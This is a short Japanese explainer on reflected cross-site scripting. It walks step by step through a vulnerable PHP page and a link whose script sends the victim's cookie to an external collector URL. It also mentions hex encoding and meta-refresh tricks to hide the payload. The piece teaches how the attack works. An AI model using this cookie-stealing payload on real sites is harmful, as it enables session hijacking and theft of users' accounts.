クロスサイトスクリプティング

次のWebページに，XSSによるクッキー盗用の原始的なコード例が載っています。 http://www.cgisecurity.com/articles/xss-faq.shtml#examples http://lovemorgue.org/xss.html#example 私なりに噛み砕いて説明すると次のようになるでしょうか。（以下，文章中にhttp://やwww.が含まれていると自動的にHyperLinkになるようなので，ttp://やww.で表記します） １．標的WebサイトのPHPプログラム ttp://host/a.php には脆弱性があります。ttp://host/a.php?variable=<H1>ABC</H1> とリクエストすると，変数variableの値をサニタイズせずにそのままHTML中に埋め込んで次のようにWebブラウザにレスポンスしてくるようなプログラムです。 <html> <body> <H1>ABC</H1> </body> </html> ２．またこの標的WebサイトではCookieに user=zeno;id=021 といったユーザデータを保存しています。したがって Javascript実行を許可しているWebブラウザで ttp://host/a.php?variable=<script>document.cookie</script> とリクエストすると，Webブラウザ画面に自分のCookieデータが表示されます。（この段階では，自分の意思でhostにアクセスしており，自分のCookieを見ているわけですから，漏洩はしていません） ３．上記ができるなら，適当なホームページやHTMLが書ける掲示板やHTMLメールに，次のようなHyperLinkを書くこともできます。 <A HREF="ttp://host/a.php?variable=<script>document.location='ttp://ww.cgisecurity.com/cgi-bin/cookie.cgi?'+document.cookie</script>">どうなるかな？</A> 「どうなるかな？」をクリックすると標的Webサイトにvariableを渡し，<script>……</script>部分が埋め込まれたHTMLページを入手し，Webブラウザ側でJavascriptを実行してCookieの中身を表示し，そのデータを悪意あるWebサイト ww.cgisecurity.com のCGIプログラムに引数として渡します。悪意サイトの cookie.cgi はその後，おそらく何事もないような偽装HTMLページをレスポンスしてくることでしょう。 ４．あとは，コードの中身を解読しづらくするために，Hex表記やリダイレクトURLを使ったり，HyperLinkのクリックなしで済むよう <meta http-equiv="Refresh"> を使ったり，といった偽装を施します。 ポイントは，あるサイトのCookieを別のサイトが読んでいるのではない，ということですね。標的Webサイトに移動してそのCookieを表示したのも，そのデータをURLの後ろに付加して悪意あるWebサイトに送信したのも，そのユーザ自身の行為なわけです，自動化されていて意識できなかったにしろ。